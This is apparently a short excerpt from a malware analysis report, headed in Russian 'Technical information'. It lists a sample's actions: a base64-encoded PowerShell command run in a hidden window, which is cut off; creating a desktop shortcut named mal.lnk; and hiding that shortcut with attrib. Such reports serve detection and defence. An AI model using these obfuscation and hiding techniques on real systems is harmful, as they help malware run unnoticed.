Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -enc "JABtAGEAbABMAG8AYwAgAD0AIAAkAGgAbwBtAGUAIAArACAAIgBcAEQAZQBzAGsAdABvAHAAXABtAGEAbAAuAGwAbgBrACIAIAA7ACAAJABXAHMAaABTAGgAZQBsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AT...
- %HOMEPATH%\desktop\mal.lnk
- %HOMEPATH%\desktop\mal.lnk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -enc "JABtAGEAbABMAG8AYwAgAD0AIAAkAGgAbwBtAGUAIAArACAAIgBcAEQAZQBzAGsAdABvAHAAXABtAGEAbAAuAGwAbgBrACIAIAA7ACAAJABXAHMAaABTAGgAZQBsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AT...' (со скрытым окном)
- '<SYSTEM32>\attrib.exe' +h %HOMEPATH%\Desktop\mal.lnk